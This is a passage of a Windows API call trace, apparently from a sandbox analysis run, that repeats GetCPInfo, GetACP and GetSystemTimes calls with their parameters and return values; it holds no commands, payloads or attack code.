lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.252] GetACP () returned 0x4e4 [0164.252] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.252] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.252] GetACP () returned 0x4e4 [0164.252] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.252] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.252] GetACP () returned 0x4e4 [0164.252] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.252] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.252] GetACP () returned 0x4e4 [0164.252] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.253] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.253] GetACP () returned 0x4e4 [0164.253] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.253] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.253] GetACP () returned 0x4e4 [0164.253] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.253] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.253] GetACP () returned 0x4e4 [0164.253] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.253] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.253] GetACP () returned 0x4e4 [0164.253] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.253] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.253] GetACP () returned 0x4e4 [0164.253] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.253] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.253] GetACP () returned 0x4e4 [0164.253] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.253] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.253] GetACP () returned 0x4e4 [0164.253] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.253] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.253] GetACP () returned 0x4e4 [0164.253] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.254] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.254] GetACP () returned 0x4e4 [0164.254] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.254] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.254] GetACP () returned 0x4e4 [0164.254] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.254] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.254] GetACP () returned 0x4e4 [0164.254] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.254] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.254] GetACP () returned 0x4e4 [0164.254] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.254] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.254] GetACP () returned 0x4e4 [0164.254] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.254] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.254] GetACP () returned 0x4e4 [0164.254] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.254] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.254] GetACP () returned 0x4e4 [0164.254] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.254] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.254] GetACP () returned 0x4e4 [0164.254] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.255] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.255] GetACP () returned 0x4e4 [0164.255] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.255] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.255] GetACP () returned 0x4e4 [0164.255] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.255] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.255] GetACP () returned 0x4e4 [0164.255] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.255] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.255] GetACP () returned 0x4e4 [0164.255] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.255] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.255] GetACP () returned 0x4e4 [0164.255] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.255] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.255] GetACP () returned 0x4e4 [0164.255] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.255] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.255] GetACP () returned 0x4e4 [0164.255] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.256] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.256] GetACP () returned 0x4e4 [0164.256] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.256] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.256] GetACP () returned 0x4e4 [0164.256] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.256] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.256] GetACP () returned 0x4e4 [0164.256] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.256] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.256] GetACP () returned 0x4e4 [0164.256] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.256] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.256] GetACP () returned 0x4e4 [0164.256] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.256] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.256] GetACP () returned 0x4e4 [0164.256] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.256] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.256] GetACP () returned 0x4e4 [0164.256] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.257] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.257] GetACP () returned 0x4e4 [0164.257] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.257] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.257] GetACP () returned 0x4e4 [0164.257] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.257] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.257] GetACP () returned 0x4e4 [0164.257] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.257] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.257] GetACP () returned 0x4e4 [0164.257] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.257] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.257] GetACP () returned 0x4e4 [0164.257] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.257] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.257] GetACP () returned 0x4e4 [0164.257] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.257] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.257] GetACP () returned 0x4e4 [0164.257] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.257] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.257] GetACP () returned 0x4e4 [0164.257] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.258] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.258] GetACP () returned 0x4e4 [0164.258] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.258] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.258] GetACP () returned 0x4e4 [0164.258] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.258] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.258] GetACP () returned 0x4e4 [0164.258] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.258] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.258] GetACP () returned 0x4e4 [0164.258] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.258] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.258] GetACP () returned 0x4e4 [0164.258] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.258] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.258] GetACP () returned 0x4e4 [0164.258] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.258] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.258] GetACP () returned 0x4e4 [0164.258] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.258] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.259] GetACP () returned 0x4e4 [0164.259] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.259] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.259] GetACP () returned 0x4e4 [0164.259] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.259] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.259] GetACP () returned 0x4e4 [0164.259] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.259] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.259] GetACP () returned 0x4e4 [0164.259] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.259] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.259] GetACP () returned 0x4e4 [0164.259] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.259] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.259] GetACP () returned 0x4e4 [0164.259] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.259] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.259] GetACP () returned 0x4e4 [0164.259] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.259] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.260] GetACP () returned 0x4e4 [0164.260] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.260] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.260] GetACP () returned 0x4e4 [0164.260] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.260] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.260] GetACP () returned 0x4e4 [0164.260] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.260] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.260] GetACP () returned 0x4e4 [0164.260] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.260] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.260] GetACP () returned 0x4e4 [0164.260] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.260] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.260] GetACP () returned 0x4e4 [0164.260] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.260] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.260] GetACP () returned 0x4e4 [0164.260] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.261] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.261] GetACP () returned 0x4e4 [0164.261] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.261] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.261] GetACP () returned 0x4e4 [0164.261] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.261] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.261] GetACP () returned 0x4e4 [0164.261] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.261] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.261] GetACP () returned 0x4e4 [0164.261] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.261] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.261] GetACP () returned 0x4e4 [0164.261] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.261] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.261] GetACP () returned 0x4e4 [0164.261] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.262] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.262] GetACP () returned 0x4e4 [0164.262] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.262] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.262] GetACP () returned 0x4e4 [0164.262] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.262] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.262] GetACP () returned 0x4e4 [0164.262] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.262] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.262] GetACP () returned 0x4e4 [0164.262] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.262] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.262] GetACP () returned 0x4e4 [0164.262] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.262] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.262] GetACP () returned 0x4e4 [0164.262] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.262] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.262] GetACP () returned 0x4e4 [0164.262] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.263] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.263] GetACP () returned 0x4e4 [0164.263] GetSystemTimes (in: lpIdleTime=0x18fa70, 